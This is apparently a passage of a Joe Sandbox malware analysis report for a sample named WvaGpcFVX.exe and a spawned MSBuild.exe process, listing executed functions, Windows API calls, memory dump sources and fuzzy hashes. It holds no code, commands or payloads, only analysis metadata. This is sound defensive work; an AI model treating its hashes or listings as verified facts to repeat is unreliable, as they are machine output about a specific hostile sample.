Source File: 00000009.00000002.4700462770.0000000002ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02ACD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2acd000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
Instruction ID: 755565e32251b9daee8104500d338ef9751317c3a23ed3ef788897b1bf9260c5
Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
Instruction Fuzzy Hash: 8D11BB75504684CFCB11CF14D9C4B16BBA2FB88328F34C6AED84A4B652C73AD44ACF62

Function 06782210 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7800fd00dd1aa36c968b600125c43a946f28e6ea52f6fa206dff44fb4dc4af8
Instruction ID: 88d9b3d526864543771f0d9e99cb6237b566b41e457596e8db65ddbcdd173be4
Opcode Fuzzy Hash: a7800fd00dd1aa36c968b600125c43a946f28e6ea52f6fa206dff44fb4dc4af8
Instruction Fuzzy Hash: 5A118275F602118FC790EBB8E50866A7BF4EF8876271241A9E425DB351DB36CE05CBD0

Function 02B15607 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72af85cf74149ee405e5a1cac6e1fd5e64c86a6f13a105f1039ea12921cceed4
Instruction ID: f58dfd95b6f5de600a2f807c2c5c7a63eb84ac7ed29f966f98ec39a4b6289b12
Opcode Fuzzy Hash: 72af85cf74149ee405e5a1cac6e1fd5e64c86a6f13a105f1039ea12921cceed4
Instruction Fuzzy Hash: 300192726001156FDB119E58A8006AF3BE7DFD9751F588026F915D7280CB75C8129BE4

Function 06781CA1 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce2f515f30940f831bfa9f09d457bb8ef6861029e1e4227f55aff088cf25d636
Instruction ID: 59dda81ae57a1cabed554fe63279d08e36e7d22aa20db2907aa19b2644779ad7
Opcode Fuzzy Hash: ce2f515f30940f831bfa9f09d457bb8ef6861029e1e4227f55aff088cf25d636
Instruction Fuzzy Hash: 50012631B482814FC705EB39E8445363FAAAF8126136644FBE806CB263EA20CC01C761

Function 06782188 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53f3d4b5b2756946efbfa844fece5e394191a978e6c538c06d24015c53cee0e9
Instruction ID: aab58d49583ad9b96e39bbd43cc768f4f78a7925ba60a6bf4d5377034b24b7ab
Opcode Fuzzy Hash: 53f3d4b5b2756946efbfa844fece5e394191a978e6c538c06d24015c53cee0e9
Instruction Fuzzy Hash: A701E470E002199FCF44EFB988046AEBBB5AF88201F50856AD529E7250EB389A01CBD5

Function 06781CD0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75321ede33964118d4ba28c8934ee4457d8065b6a1b04dbbf6383ef67c4834d6
Instruction ID: 97386e6fce7cb558c75ca82bed5cf737edc85a42263972932168512659edd69c
Opcode Fuzzy Hash: 75321ede33964118d4ba28c8934ee4457d8065b6a1b04dbbf6383ef67c4834d6
Instruction Fuzzy Hash: 94F082313502048FD708AF3AE858A3A77AAEFC46507668069F506CB3A0DE30DC01CBA0

Function 02B12010 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b242d2318f46d856d9c56a0a774022efaddad55cdd4345f91b042615de742e
Instruction ID: 6a6877b44d4443a5a30fe6eed48910b24fb8ac2d59ed325282a2d20d6c8d87eb
Opcode Fuzzy Hash: 25b242d2318f46d856d9c56a0a774022efaddad55cdd4345f91b042615de742e
Instruction Fuzzy Hash: 11E02633D203AA56CB009BB4AC055EFBB38EFA2210F444511D26032000EFB0220AC3E0

Function 02B12020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 920a06ff97e6bc80e28536bbc3829f8a127a9f9f2f7a44aa1c8d072c13bd2884
Instruction ID: 147ee78828227962921ec1eba055844c63657c25adc41008e53666b5b6430e1e
Opcode Fuzzy Hash: 920a06ff97e6bc80e28536bbc3829f8a127a9f9f2f7a44aa1c8d072c13bd2884
Instruction Fuzzy Hash: C1D01732E2126B968B00AAA5EC048EEB738EE96661B948626D52437140EB70665986A1

Function 02B18258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 283197759c01ff3fc626353f85bcec3c821462c6153ac3956c3ccd51a249e998
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 57C0123320C5282AA629108E7C40AA3AB8CE3C22B4A6901B7F95CA3200A8429C8041E8

Function 02B1A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e32aede1268d7a899dee3dd07c4416ef91e2a53c18698dd24c5cec879812bb74
Instruction ID: a5cb526665745d2b33626318529ff9692780eb2f70a368e6213682527d56eb8b
Opcode Fuzzy Hash: e32aede1268d7a899dee3dd07c4416ef91e2a53c18698dd24c5cec879812bb74
Instruction Fuzzy Hash: 4FD0677AB11108DFCB049F99E8449DEB7B6FF9C221B048116F925A3261CA319921DBA4

Function 02B15EA8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e74813df1c5ce9ca02088e5fc90395ba9aa7ad1d7150b9f3dc3c5d017ef28d41
Instruction ID: 7c79b01ac5a8fdbfce8d39f6d82f6c7eac6f2b5d8f610b23f84a93977dac86ea
Opcode Fuzzy Hash: e74813df1c5ce9ca02088e5fc90395ba9aa7ad1d7150b9f3dc3c5d017ef28d41
Instruction Fuzzy Hash: 51D02E71928383CBD302F360EE500213B32BA90605BC845ABE800CE60AE6B898898B50

Function 02B15EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c2b749b805688e60285f2f531170347f267791727c52c9faf1d5f901a7641d
Instruction ID: 5768cb34f1825eeee7dc9794d3caba500e1e8a1841429c9b61b0f4f55e28d378
Opcode Fuzzy Hash: 00c2b749b805688e60285f2f531170347f267791727c52c9faf1d5f901a7641d
Instruction Fuzzy Hash: 5CC0123013170BCBD601F775FA49655772ABAD0604F404515B1094D219DE74AC854694

Analysis Process: WvaGpcFVX.exePID: 7304, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	144
Total number of Limit Nodes:	7

Executed Functions

Function 02BCAE28 Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02BCB07E

Memory Dump Source

Source File: 0000000A.00000002.2338396959.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2bc0000_WvaGpcFVX.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c686fe2b9dab92bc6752fd928db4e8ceeabf6bb65f41f4a1c848b6a27de3d5da
Instruction ID: 4de111d78e277a442548b7e42f88d74bf009b287ac78c6ce151875ceb3466149
Opcode Fuzzy Hash: c686fe2b9dab92bc6752fd928db4e8ceeabf6bb65f41f4a1c848b6a27de3d5da
Instruction Fuzzy Hash: 267134B0A00B098FD724DF29D45475ABBF1FF88304F208A6ED49ADBA40DB75E845CB90

Function 02BC590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02BC59C9

Memory Dump Source

Source File: 0000000A.00000002.2338396959.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2bc0000_WvaGpcFVX.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d5dda27fd6172d6cff5f7c0ecdc08f6029a52723bc151d7af35f0811bb86b38a
Instruction ID: 15afc6da57a4cd89b5156fff0c3216009add8a043442a0a3049f126c8d2d9b71
Opcode Fuzzy Hash: d5dda27fd6172d6cff5f7c0ecdc08f6029a52723bc151d7af35f0811bb86b38a
Instruction Fuzzy Hash: 8541CF70C00719CBDB24CFAAC884BCEBBB1BF49714F6080AAE508AB251DB756945CF91

Function 02BC44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02BC59C9

Memory Dump Source

Source File: 0000000A.00000002.2338396959.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2bc0000_WvaGpcFVX.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f242d04b8d40c3b1a2422b9f01b1d0f7968e9a9e24449f6c0536a4bf1a95db81
Instruction ID: a10e9ac2fdf07bfdb45b5233e557e7799692caace734915a3206b875f1329ef3
Opcode Fuzzy Hash: f242d04b8d40c3b1a2422b9f01b1d0f7968e9a9e24449f6c0536a4bf1a95db81
Instruction Fuzzy Hash: 3941CE70C0071DCBDB24CFAAC884B8EBBB5FF48714F6080AAE508AB251DB756945CF90

Function 05384040 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05384101

Memory Dump Source

Source File: 0000000A.00000002.2341562619.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5380000_WvaGpcFVX.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b133d5d13f850b197acd655ac35fb5ea0069f51610ab73edbff4f9dc1dc9e5f9
Instruction ID: c57a3d4a4bafb495d177c150366fe2006147e6aabf8e13aaf6ef256fefdfea8d
Opcode Fuzzy Hash: b133d5d13f850b197acd655ac35fb5ea0069f51610ab73edbff4f9dc1dc9e5f9
Instruction Fuzzy Hash: B9410BB8900309CFDB14DF99C448AAAFBF5FB88318F248459D519AB721D775A841CFA0

Function 0538A660 Relevance: 1.6, APIs: 1, Instructions: 92
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0538A72F

Memory Dump Source

Source File: 0000000A.00000002.2341562619.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5380000_WvaGpcFVX.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 8099f8f935c4d4031736953a8937dedffbb496e6ab98d7eae0b716fa7b80e097
Instruction ID: b465e36ff2ca6c076297c55840c840c71cc5e98c977724acdc87c7ca9e89567d
Opcode Fuzzy Hash: 8099f8f935c4d4031736953a8937dedffbb496e6ab98d7eae0b716fa7b80e097
Instruction Fuzzy Hash: FC318D719043899FCB119FA9C844AEABFF8EF49310F14805AE554A7262C375D854DBA1

Function 02BCD2FC Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02BCD6D6,?,?,?,?,?), ref: 02BCD797

Memory Dump Source

Source File: 0000000A.00000002.2338396959.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2bc0000_WvaGpcFVX.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 966eca2c3cb59a59d8fc23809919b31535b73c0a7325889ec8f85e9ab522343a
Instruction ID: c2f9e82ffbf7ee4196002a17c4dd2e2930939e7626689738b03ccfa96114e3a3
Opcode Fuzzy Hash: 966eca2c3cb59a59d8fc23809919b31535b73c0a7325889ec8f85e9ab522343a
Instruction Fuzzy Hash: 6321E4B5900259DFDB10CF9AD984ADEFBF4EB48320F24846AE918A7350D374A950CFA4

Function 02BCD708 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02BCD6D6,?,?,?,?,?), ref: 02BCD797

Memory Dump Source

Source File: 0000000A.00000002.2338396959.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2bc0000_WvaGpcFVX.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 30651a3d1c522196548d195ef1972292d2102791c14299f56f90c9aaa56df640
Instruction ID: 718e3258d850a6f5928f19ec97983035c455db6b678ef575dca2e5d1d7a85350
Opcode Fuzzy Hash: 30651a3d1c522196548d195ef1972292d2102791c14299f56f90c9aaa56df640
Instruction Fuzzy Hash: 1C2116B5900219DFDB10CF9AD984ADEBBF4EB48320F24842AE918A3310C374A940CFA4

Function 0538A6C0 Relevance: 1.6, APIs: 1, Instructions: 53
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0538A72F

Memory Dump Source

Source File: 0000000A.00000002.2341562619.0000000005380000.00000040.00000800.00020000.00000000.sdmp, Offset: 05380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5380000_WvaGpcFVX.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 0648e692cfcdd4c66a6eb0dcfc32b656ea15f30f0a499d56d9c0ed62654a1305
Instruction ID: 13e33ba7cc3d4455851baddca8e016d58735e1c023a32f039e83772ad980d97f
Opcode Fuzzy Hash: 0648e692cfcdd4c66a6eb0dcfc32b656ea15f30f0a499d56d9c0ed62654a1305
Instruction Fuzzy Hash: DD1149B5800349DFDB10DF9AC844BDEBFF8EB48320F24841AE554A7210C375A950DFA4

Function 02BCB018 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02BCB07E

Memory Dump Source

Source File: 0000000A.00000002.2338396959.0000000002BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2bc0000_WvaGpcFVX.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ccedc05c2cc39db371c66d698cb6566133a4ff916fee4098d20be6b48b859418
Instruction ID: 9721515567baa291919a5064c794114bca0ea8e95118209e39b846f0f0ad85cd
Opcode Fuzzy Hash: ccedc05c2cc39db371c66d698cb6566133a4ff916fee4098d20be6b48b859418
Instruction Fuzzy Hash: 7C1113B5C007498FDB10CF9AC444BDEFBF4EB88624F20845AD528A7210D379A545CFA1

Function 082C06C0 Relevance: 1.5, APIs: 1, Instructions: 46
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 082C0725

Memory Dump Source

Source File: 0000000A.00000002.2344459991.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_82c0000_WvaGpcFVX.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c2fe4c17a291b804bb0b1e28c25612438541110aeaec26c855d5ad5f87c1081b
Instruction ID: e5d3ab1ae5244cf55b82290ba3b6e39c62a2185e012c4dbbf8720af8acbb6f6a
Opcode Fuzzy Hash: c2fe4c17a291b804bb0b1e28c25612438541110aeaec26c855d5ad5f87c1081b
Instruction Fuzzy Hash: 1F1145B5800349DFDB10CF9AC884BDEFBF8EB48324F20841AE558A7200C374A544CFA0

Function 082C06C8 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 082C0725

Memory Dump Source

Source File: 0000000A.00000002.2344459991.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_82c0000_WvaGpcFVX.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 69a322bff06a8457f0c8a84deba88d2025fda54f8f9f28327ec1b433f784f552
Instruction ID: a6ffee6234126effa184bff73917fd36ef656487e35ccec3ad8a077dbfeab3c6
Opcode Fuzzy Hash: 69a322bff06a8457f0c8a84deba88d2025fda54f8f9f28327ec1b433f784f552
Instruction Fuzzy Hash: 5E1112B5800749DFDB10CF9AC984BDEFBF8EB48320F20841AE558A7200C379A944CFA1

Function 02B6D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2338049823.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b6d000_WvaGpcFVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1fe6444ae5098f5ad3be6601ec8bcd4aed48c9144c0662c7140475ccedabb7
Instruction ID: 442ade5bb441aa3f625c67f9416a37f37aa925e757b44836a912a121966b803e
Opcode Fuzzy Hash: 5e1fe6444ae5098f5ad3be6601ec8bcd4aed48c9144c0662c7140475ccedabb7
Instruction Fuzzy Hash: 4F212871600245DFDB08DF14D9C8F26BB65FB88314F28C5ADE9094B656C33AE856CBA1

Function 02B6D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2338049823.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b6d000_WvaGpcFVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9e88be44ef0e06ae8e3493591d0771c329e6c3520d408dc0dd5c4ea5934a9b
Instruction ID: c7c978895569681258bc4047e460e29599849ee1b6fef39ecea1914705c0ce73
Opcode Fuzzy Hash: 8a9e88be44ef0e06ae8e3493591d0771c329e6c3520d408dc0dd5c4ea5934a9b
Instruction Fuzzy Hash: 9F210372600241DFDB05DF14D9C8B26BF65FB88318F24C5A9E9090B657C33AD456CAA1

Function 02B7D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2338146952.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b7d000_WvaGpcFVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 329d4ee2af27c8bb5c058ed67d86b3328300a6fc356bc551bbc2e1988bf04bca
Instruction ID: a392d2c8bd49ec1a1c916d20e7109eec75235473b0f330a7073d2338e0941665
Opcode Fuzzy Hash: 329d4ee2af27c8bb5c058ed67d86b3328300a6fc356bc551bbc2e1988bf04bca
Instruction Fuzzy Hash: 08210471604205EFDB05DF14D9C0B26BBA5FF98314F24C6ADE99A4B292C336D447CA61

Function 02B7D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2338146952.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b7d000_WvaGpcFVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b30b7c81a0b659705423e39848f04a9ff175655115ce6a8d5a7ac5e897c5e256
Instruction ID: b6e6400c726cf6ad9777b4ebb9e25b777c5026492a806ea9fc102af6b877c0b4
Opcode Fuzzy Hash: b30b7c81a0b659705423e39848f04a9ff175655115ce6a8d5a7ac5e897c5e256
Instruction Fuzzy Hash: 35213171604201EFDB14DF24D9D0B26BBA1FF88314F20C6ADE80A4B292C33AD847CB61

Function 02B7D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2338146952.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b7d000_WvaGpcFVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22db724330d40d6f7381817210283c6cb9f226f9f15e78ed3b49f0df17cb410c
Instruction ID: 85df0f6f4ac752a73d615aad5a20f4ce460bd27a305fa3e360c1150615a3ced9
Opcode Fuzzy Hash: 22db724330d40d6f7381817210283c6cb9f226f9f15e78ed3b49f0df17cb410c
Instruction Fuzzy Hash: 3B216F755083849FCB12CF24D994B15BF71EF46214F28C5EAD8498F2A7C33A985ACB62

Function 02B6D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2338049823.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b6d000_WvaGpcFVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction ID: c6770495efc9af8c52f7900f2fca5103ab9a434565c720d421014237a812da7d
Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction Fuzzy Hash: 8111D376504280CFCB15CF10D5C4B26BF71FB84318F24C6AAD8490B657C33AD456CBA1

Function 02B6D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2338049823.0000000002B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b6d000_WvaGpcFVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction ID: a3ffb4e887946c4c8cc8665f8f8aace8759494910d8a347f6551f3f84259f7c2
Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction Fuzzy Hash: C811D376504245DFCB15CF10D5C4B26BF71FB84324F28C6A9D9094B656C33AE856CBA1

Function 02B7D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2338146952.0000000002B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b7d000_WvaGpcFVX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
Instruction ID: 1f993339d8aa07e8443e7e08aacf60c5af2a1558c4b225b580c7463f0afe942b
Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
Instruction Fuzzy Hash: A0118B75504284DFCB15CF10D5C4B15BBA1FF84218F28C6A9DC894B696C33AD44ACB61

Analysis Process: MSBuild.exePID: 7636, Parent PID: 7304COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	29
Total number of Limit Nodes:	1

Executed Functions

Function 053777A8 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.4705706975.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9774d0c9b2bd1095a33ec131fe8c833c25a5ba1589c55653ac451f26ef7310cf
Instruction ID: 7685a5e8991c5a9c6fb18a165a85096d066578ea0ed62ed79454208c6a89fd50
Opcode Fuzzy Hash: 9774d0c9b2bd1095a33ec131fe8c833c25a5ba1589c55653ac451f26ef7310cf
Instruction Fuzzy Hash: 1CF1E374E01218DFDB24DFA9C884B9DBBB2FF88304F5481A9D848AB355DB749986CF50

Function 05377B8C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 05377CCE

Memory Dump Source

Source File: 00000010.00000002.4705706975.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5370000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 42768a49eabe35f6e778ab0e11a9e6efdb64a998ae919c83d243222384eb9758
Instruction ID: 167c5521946f6cb114d7e312af73f401bf0e1606a2a1a9d2bcf969a61159f49b
Opcode Fuzzy Hash: 42768a49eabe35f6e778ab0e11a9e6efdb64a998ae919c83d243222384eb9758
Instruction Fuzzy Hash: D1113D74E0020A9FEB24DBA8D484EBDB7F5FB88304F148165E844E7345D7759941CB50

Function 00F3D005 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.4699450279.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f3d000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a609b6208e03fa756d2c69fbf884b37f09b391e47e159a25846cf4c946e9cf4
Instruction ID: 1e99a1c07542c104ab6e7fd05faad224d7db00c578a74bc2a69a8b5ba8ef2591
Opcode Fuzzy Hash: 4a609b6208e03fa756d2c69fbf884b37f09b391e47e159a25846cf4c946e9cf4
